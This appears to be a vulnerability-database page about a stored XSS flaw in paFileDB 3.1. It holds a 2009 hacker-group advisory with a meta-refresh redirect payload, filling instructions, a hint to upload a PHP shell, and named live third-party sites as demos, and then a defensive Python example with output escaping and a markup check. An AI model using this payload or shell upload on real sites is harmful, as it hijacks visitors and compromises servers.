paFileDB 3.1 Cross Site Scripting

Reported: 22 Dec 2009 00:00:00, by ViRuS_HiMa. Type: packetstorm. Source: packetstormsecurity.com

paFileDB 3.1 XSS Vuln as Redirecting Method, web library for file upload/download

Code
you can copy the exploit source from :  
http://www.hell-z0ne.org/pafiledb.txt  
  
[*]##############################################  
[+] |____ViRuS_HiMa@YouR SyS__|__\ #  
[+] |______________________|___||\*___ #  
[+] |______________________|___||""|"*\___, #  
[+] |______________________|___||""|*"|___|| #  
[+] "([ (@)''(@)""""""(|*(@)(@)********(@)* #  
[+]======================================================================||  
[*] Title : paFileDB 3.1 Xss Vuln as Redirecting Method . ||  
[!] Author : ViRuS_HiMa ||  
[!] My Site : wWw.HeLL-z0ne.org ||  
[!] E-Mail : eGypT_GoVeRnMenT[at]HoTmaiL[dot]CoM ||  
[!] Location : Null,Null,Data+From+Egypt+Where+City_Name=Cairo-- ||  
[!]======================================================================||  
[!] [H]eL[L] [Z]on[E] [C]re[W] ||  
[!]======================================================================||  
  
Description :  
  
paFileDB is a web library which allows you to upload & download files  
  
to your site, bla bla bla :p  
  
Bug :  
  
it was vulnerable before to uploading your evil files, from:  
  
www.sitename.com/PfdPath/dload.php?action=user_upload  
  
some sites are asking you to register, and others weren't accepting any  
  
extensions except image extensions, and more problems.  
  
so we're gonna use the same exploit but as an XSS method,  
  
Live Demo :  
  
http://forum.cicero-project.net/dload.php?action=user_upload  
http://sylvanna.3e-online.org/phpBB2/dload.php?action=user_upload  
  
Enter the URL, use this code:  
  
">"">><meta http-equiv="Refresh" content="0;url=http://hell-z0ne.org">"">  
  
write the code in these fields:  
  
"File Name","Short Description","Long Description"  
  
and write anything in the other fields,  
  
in the "Category" field you have to choose a category which has the negative mark "-"  
  
in Screenshot field you can upload your phpshell ,   
  
if it doesn't accept it you can upload any image, whatever,  
  
now press Add File, then go to:  
  
www.sitename.com/PfdPath/dload.php  
  
live demo :  
  
http://sylvanna.3e-online.org/phpBB2/dload.php  
http://forum.cicero-project.net/dload.php  
  
and enter the category where you posted your XSS code,  
  
cool, it's redirecting the site to your URL that you put in the XSS code  
  
http://hell-z0ne.org  
  
">"">><meta http-equiv="Refresh" content="0;url=http://hell-z0ne.org">"">  
[!]==============================================  
[!] ya providor y2goog we m2goog 3amlen eh :p [!]  
[!] Welcome, my brother Black_Raptor :) [!]  
[!]=================================================================================  
[!] Greatz : Providor,HcJ,ExH,Sina,Hakxer,oXide,Dr-Plus,Mo3tz,Prof.Selim, [!]  
[!] X@Injector,Maestro-dz,Kasper-ksa,Qahtan-Sniper,Mr.G7eeM And ze Otherz[!]  
[!]==================================================================================  
  
  
  
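Added example, not code from the advisory or from paFileDB: the bug class the advisory relies on (a stored "File Name"/description value dropped unescaped into the listing page) beside the hardened form that HTML-escapes every stored value at output time, plus a triage check for entries that already contain markup. The row layout and field names are assumptions; the payload string is the one quoted in the advisory.

```python
import html
import re

# Payload quoted in the advisory, used here as the test input.
ADVISORY_PAYLOAD = (
    '">"">><meta http-equiv="Refresh" '
    'content="0;url=http://hell-z0ne.org">"">'
)


def render_row_vulnerable(name: str, short_desc: str, long_desc: str) -> str:
    """Listing row that drops stored fields straight into HTML.

    Reconstructs the bug class (hypothetical layout, not paFileDB's real
    template): a stored entry whose fields carry markup is emitted verbatim,
    so a <meta refresh> in "File Name" redirects every visitor of the listing.
    """
    return (
        f'<tr><td><a href="dload.php?file={name}">{name}</a></td>'
        f'<td title="{short_desc}">{long_desc}</td></tr>'
    )


def render_row_hardened(name: str, short_desc: str, long_desc: str) -> str:
    """Same row with every stored value HTML-escaped at output time.

    quote=True also encodes " and ', which matters in the attribute contexts
    (href, title) where the payload's leading '">' would otherwise close the
    tag early and start injecting its own markup.
    """
    esc = lambda s: html.escape(s, quote=True)
    return (
        f'<tr><td><a href="dload.php?file={esc(name)}">{esc(name)}</a></td>'
        f'<td title="{esc(short_desc)}">{esc(long_desc)}</td></tr>'
    )


# Matches any HTML tag (<meta ...>, <script>, <img onerror=...>, ...).
_TAG = re.compile(r"<\s*/?\s*[a-z][^>]*>", re.IGNORECASE)


def contains_markup(value: str) -> bool:
    """Triage check for an existing database: True if a stored field holds
    an HTML tag. File names and descriptions never legitimately do, so a hit
    marks an entry to review or remove after the output-escaping fix."""
    return _TAG.search(value) is not None
```

The hardened row is what a fix should look like; the triage check is only for cleaning up entries that were submitted before the fix.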

Vulners AI Score: 7.4 (High risk)